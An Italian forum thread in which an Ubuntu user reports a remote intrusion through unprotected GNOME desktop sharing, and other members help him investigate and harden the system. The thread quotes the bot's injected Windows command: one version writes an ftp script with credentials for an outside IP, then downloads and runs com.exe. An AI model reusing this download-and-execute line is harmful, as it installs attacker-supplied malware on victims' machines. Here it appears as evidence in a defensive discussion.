Scrivo qui anche perché, pur essendo un problema di sicurezza, penso sia più legato all'ìambiente in cui è avventuo.

Sul fisso di casa ho installata Ubuntu 12.04 con Unity. Sono collegato a internet tramite un normalissimo router dglink e in cascata ho un router Tp-link gigabit che mi gestisce anche il traffico wifi.

Poco fa, mentre lavoravo al pc, ho avuto una bruttissima sorpresa. Mentre scrivo un comando sull'emulatore di terminale mi sono accorto che non avevo il controllo della situazione, perché qualcun altro ha digitato:

"ftp.h4ck.biz 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo &>^C's:ik&l ik &update.ex&xit > echo You got owned"

ho guardato con attenzione e ho notato he in alto c'era l'icona della condivisione del desktop di gnome, che sicuramente n avevo attivato.

PEr cui direi che qualcuno mi ha "bucato". Ora ho ovivamnete provveduto a cambiare la password dell'account google anche per evitare sorprese con Android, e provvederò a cambiare anche le altre.
Avevo già intenzione di formattare perché dopo anni con ubuntu+unity volevo tornare a Kde, con SAbayon.
Però prima di "ranzare" via tutto vorrei chedere consiglio:

1) c'è modo di capire se sono state fatte copie di file sensibil (ad esempio le password memorizzate in firefox)
2) reinstallando mi conviene cancellare da home le varie cartelle .xxxx con le impostazioni dei prigrammi, per evtare che vi sia stato iniettato qualche codice malevolo?

Altri consigli su come capire che danni sono stati fatti, e trovare tracce dell'intrusione per capire come è stato fatto, e come evitare sorprese in futuro?
Grazie mille!!

Quali servizi avevi aperto all'esterno? Tipo il comune ssh o altro.
Repository strani o installazioni di programmi sospetti?
Amici burloni?
Il comando che hai scritto crea un file ik e lo riempie di una sequenza di comandi per prelevare qualcosa (update.exe??) da questo host ftp del dominio hack.biz (http://whois.net/whois/h4ck.biz), che sembra avere una certa storia (dal 2003/4) di attività varie anche losche (http://www.angelfire.com/un/ddos/).
Il Ctrl C soggerisce che abbia interrotto le sue attività quando si è accorto della tua presenza, ovviamente non si sa da quanto lavorava.

Posso proporti RootkitHunter (http://wiki.ubuntu-it.org/Sicurezza/RootkitHunter), ma se il lavoro fosse stato fatto bene potrebbe essere difficile rintracciare tutte le eventuali infiltrazioni malevole.

Occorre controllare la presenza di utenti e gruppi sconosciuti, di eventuali cronjob, script init o upstart o anche all'avvio del tuo Desktop Environment.
Se si tratta di un'intrusione dozzinale si drovrebbe trovare traccia delle attività nell'history dell'utente utilizzato (l'uso del desktop remoto è un po' bizzarro, mi fa pensare ad uno script kiddie).
Ovviamente si possono trovare tracce anche nei log.

I file più problematici dell'home che mi vengono in mente ora sono:
.bash_logout
.bash_profile
.bashrc
.xinitrc

I folder più sensibili che vedo controllando nella mia home sono
quelli di proprietà del desktop environment in uso
.config
.gconf*
.vnc

mmm.. appena mi sono accorto ho provveduto io a disconnettere il cavo di rete. E poi riavviare il router, per sicurezza.
Amici burloni direi di no, non hanno accesso al pc in mia assenza - è in casa mia - e non ho tra le mie cerchie amici con competenze informatiche di quest tipo, mn che meno in ambito linux.

I servizi attivi... direi si ssh, ma come dici tu, il fatto che lavorasse col controllo del desktop remoto mi fa pensare a un ragazzino.
Come repository tendo a non installare qualsiasi cosa trovo. in sources.list oltre ai canonici ho questi :

deb http://ppa.launchpad.net/myunity/ppa/ubuntu precise main
deb-src http://ppa.launchpad.net/myunity/ppa/ubuntu precise main


deb http://ppa.launchpad.net/amsn-daily/ppa/ubuntu precise main
deb-src http://ppa.launchpad.net/amsn-daily/ppa/ubuntu precise main

deb http://ppa.launchpad.net/gezakovacs/ppa/ubuntu precise main
deb-src http://ppa.launchpad.net/gezakovacs/ppa/ubuntu precise main

Non ricordo sinceramente se ne ho aggiunti altri che qui non compaiono.

Ora provo con rootkit hunter. In ogni caso pensavo di procedere domani con la reinstallazione ex novo del pc. Provvedendo a tirare via tutte le cartelle di config in home, pace se mi perdo delle impostazioni, preferisco ripartire con un sys pulito.
Che dici?
Ora guardo anche per utenti strani e magari aggiorno più tardi.
Per ora.. grazie mille!

fatto lo scan con rootkit hunter.. ecco un warning rilevato:
/usr/bin/unhide.rb

Ho visto che unhide è un falso positivo.
Gli altri due warning sono dovuti al ftto che ho ssh con accesso a root e l'ultima " Checking for hidden files and directories ".

PEr sicurezza domani quando installo gentoo tiro via le cartelle nascoste dei programmi.
Sarebbe però interesante capire come mi ha fatto lo scherzetto.
Non so se c'entra.. ma avevo aperto Trasmission per scaricare giù alcune iso di sabayon. C'è qualche vulnerabilità in transmission, per caso? Non mi viene in mente altro.

Il file segnalato dall'hunter dovrebbe essere un falso positivo. (http://sourceforge.net/p/rkhunter/bugs/95/)

Se avevi già una mezza idea di reinstallare tanto vale farlo.
Controlla alias, in questo caso potresti avere un file che specifica alias indesiderati nella tua home, ma dovrebbe essere incluso esplicitamente in .bashrc.
Ah, controlla anche se hai qualcosa di strano in env, in particolare penserei alla variabile $PATH, sia di root che del tuo utente (potrebbe contenere qualche cartella aggiuntiva nella tua home con eseguibili intrusi).

Per finire una osservazione su ssh. Se avevi aperto la porta 22 su internet è probabile che siano entrati da lì dopo aver fatto un po' di brute force con delle password comuni.
Anch'io ho ssh aperto da circa 6 anni ma non ho subito tentativi di intrusione perché ho utilizzato una porta alta qualsiasi. A questo ho abbinato fail2ban (https://help.ubuntu.com/community/Fail2ban) (attenzione, può essere ritorto contro l'utilizzatore).

Esempio ricerca attività sshd nei log:for file in $(ls -rt /var/log/syslog*); do echo $file; zgrep sshd $file; done

Sono collegato a internet tramite un normalissimo router dglink

quale in particolare ? da qualche giorno da quando hanno pubblicato la backdoor in certi dlink, gli script kiddies si sono scatenati

DIR-100
DI-524
DI-524UP
DI-604S
DI-604UP
DI-604+
TM-G5240
http://techgeek.com.au/2013/10/13/d-link-router-backdoor-vulnerability-discovered/



"ftp.h4ck.biz 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo &>^C's:ik&l ik &update.ex&xit > echo You got owned"

update.exe ? su linux ? :mbe:

comunque il server nemmeno risponde
ftp ftp.h4ck.biz 21
ftp: connect: No route to host

PS: ah ecco, google trova alcune varianti: forse non scarica nulla, potrebbe essere solo un modo per fare arrivare il messaggio all'utente che è stato "owned" :rolleyes:

Secondo me la cosa va indagata prima di reinstallare, un Ubuntu desktop bucato non è roba di tutti i giorni
io propendo o per un buco nel router, o un servizio esposto (come ssh)...
che porte sono aperte/forwardate sul router ?

in attesa di maggiori informazioni, questo è molto simile, diretto al remote desktop

http://ubuntuforums.org/showthread.php?t=980832
So every day starting a little while ago, i get a number of requests to access my desktop. Always from different addresses. One day, i decide to accept it with text editor open with the text, "Who is this?" (riskay, i know). It seems to be an automated script they enters in some windows command and disconnects. Today i recorded it.

Code:
cmd /c echo open 87.230.22.187/httpdocs/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exit
echo You got owned

ok, puoi fare a meno di ranzare tutto come in Winzozz :D
controlla nelle Desktop sharing preferences se hai l'apertura delle porte sui UPNP router
qui c'è tutto:
http://www.highseverity.com/2011/11/accidentally-opening-doors-on-ubuntu.html

Ragazzi, grazie mille delle dritte.

Anche io propendo, prima di reinstallare tutto, di capire cosa sia successo per evitare errori in futuro.
Diciam che guardo il lato positivo: sto cambiando le password di email e siti che gestisco, anche se purtroppo Aruba per il cambio della password del Db mysql chiede di mandare fax con documento di identità.. un po' lungo, e senza certezza di quando la cambiano i ritrovo i siti down.

Allora, tornando in topic, il router è un Dsl 320B, con orward sul Tplink TLW1043ND.

Anche a me pareva stranofacesse riferimento a file eseguibili, infatti ho pensato che abbiano avuto accesso al remote desktop e abbiano - un soggetto umano o uno script) semplicemente iniziato a scrivere dove si poteva, quindi nel terminale.
Per ssh non ho cambiato la porta, ma la password che uso non è banale: 10 caratter alfanumerico con maiuscole e segni di interpunzione. Comunque l'ho cambiata.
Sul router tplink mi pare proprio di aver abilitato il servizio UPNP.
Adesso appena riesco a ricordarmi della password di accesso al router entro e controllo.

Per cominciare, su suggerimentodi Gimli:
ennio@frigus:~$ for file in $(ls -rt /var/log/syslog*); do echo $file; zgrep sshd $file; done
/var/log/syslog.7.gz
/var/log/syslog.6.gz
/var/log/syslog.5.gz
/var/log/syslog.4.gz
/var/log/syslog.3.gz
/var/log/syslog.2.gz
/var/log/syslog.1
/var/log/syslog


Non essendo ferratissimo in materia: ha trovato attività legate all'ssh e mi indica che è salvata in quei faile?

in .bashrc non mi pare di aver vistonulla di strano, nella sezione relativa agli alias ho questo, ma non mi pare sia "sospetto"

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
#export PATH=/Documenti/Ennio/cellulari/HTC/ROOTING/android-sdk-linux_x86/tools/:$ PATH

Ora mi spulcio i link che mi avete dato e vedo di capirci qualcosa.
Per ora grazie dell'aiuto, vediamo se ne capisco qualcosa. Sicuro come buona regola alla reinstallazione vedrò di cambiarmi la porta di ssh :)
Sempre se l'influenza no navrà la meglio sul mio corpicciuolo!

Riguardo al micro script di ricerca nei log, il tuo output non evidenzia alcuna attività del demone sshd negli ultimi 7/8 giorni (syslog ha rotazione quotidiana nella mia Debian, credo valga anche per *buntu).

Esempio dai miei log:root@phoenix:~# for file in $(ls -rt /var/log/syslog*); do echo $file; zgrep sshd $file; done
/var/log/syslog.7.gz
Oct 13 02:54:58 phoenix sshd[26672]: Accepted password for gimli from x.x.x.x port 85645 ssh2
Oct 13 03:34:18 phoenix sshd[26674]: Received disconnect from x.x.x.x: disconnected by user
/var/log/syslog.6.gz
/var/log/syslog.5.gz
/var/log/syslog.4.gz
/var/log/syslog.3.gz
/var/log/syslog.2.gz
/var/log/syslog.1
Oct 18 23:06:17 phoenix sshd[4924]: Accepted password for gimli from x.x.x.x port 60103 ssh2
Oct 18 23:10:57 phoenix sshd[5082]: Failed password for gimli from x.x.x.x port 45684 ssh2
Oct 19 01:14:19 phoenix sshd[4926]: Received disconnect from x.x.x.x: 11: disconnected by user
/var/log/syslog
Oct 19 13:23:14 phoenix sshd[2039]: Accepted password for gimli from x.x.x.x port 41669 ssh2Puoi provare a vedere anche messages, che invece è a rotazione settimanale e contiene più informazioni:for file in $(ls -rt /var/log/messages*); do echo $file; zgrep sshd $file; done

Non vedo niente di strano in .bashrc, controlla anche ~/.bash_aliases

Ecco, ti sei preso un virus! Cura anche quello! :)

Anche io propendo, prima di reinstallare tutto, di capire cosa sia successo per evitare errori in futuro.
...

non è successo nulla, non stai usando Winzozz ! :D se tu fossi stato bucato, saresti da notizia :read:

Leggiti il link al #9, è un bot di qualche povero script kiddie che scanna tutti gli IP per trovare un VNC aperto che gira su Winzozz
Devi solo verificare la configurazione del server Vino su Ubuntu:
vai su Applications->System tools->Preferences->Desktop Sharing (o come diavolo si chiama sul tuo)
guarda la checkbox "Automatically configure UPnP router to open and forward ports"
Togli il check, e mettici una password.
Poi io personalmente UPnP sul router lo disabiliterei (per essere precisi, sui router ci installo Openwrt :D )

lascia perdere i log e il cambio password, che non è successo niente ! ;)
EDIT: beh, veramente, un cambio password ogni tanto, non fa male :D

non è successo nulla, non stai usando Winzozz ! :D se tu fossi stato bucato, saresti da notizia :read:

Leggiti il link al #9, è un bot di qualche povero script kiddie che scanna tutti gli IP per trovare un VNC aperto che gira su Winzozz
Devi solo verificare la configurazione del server Vino su Ubuntu:
vai su Applications->System tools->Preferences->Desktop Sharing (o come diavolo si chiama sul tuo)
guarda la checkbox "Automatically configure UPnP router to open and forward ports"
Togli il check, e mettici una password.
Poi io personalmente UPnP sul router lo disabiliterei (per essere precisi, sui router ci installo Openwrt :D )

lascia perdere i log e il cambio password, che non è successo niente ! ;)
EDIT: beh, veramente, un cambio password ogni tanto, non fa male :D

Si, ho letto in giro e pare uno script.
E prima ho verificato epr conto mio condivisione desktop: è stata una mia clamorosa topica: in un periodo in cui avevo il pc senza monitor e dovevo usarlo in remoto - sempre dalla stesa lan - avevo lasciato configurato la condivisione in modo che accettasse accessi senza password: tanto all'epoca ero senza adsl e usavo solo il router. Cagata pazzesca, me ne sono dimenticato e allora.. sorpresa!
Per il router con Openwrt: è una di quelle cose che vrrei fare da un po', a quel che ho visto il mio permette l'installazione (e forse risolverei il problema che qualche volta lo affligge: non permette la navigazione se non riavviandolo). Ma la cosa che manca ora è il tempo, e le cose fatte di fretta, appunto... ;)

Felice di sono esser stato il primo gonzo con linux box hackerata in un battibaleno! Anche se ora farò ancora più attenzione. E ciao UPNP. Quello al massimo sui rpter degli amici pigroni :stordita:

Volevo ringraziare chi ha contribuito a fare luce su questo "leggero" attacco.
E' servito ad ampliare le mie conoscenze... e a esser ancora più accorto.

L'infezione "personale", poi.. è sotto controllo: che sia il primo caso di trasmissione virus pc-uomo? :D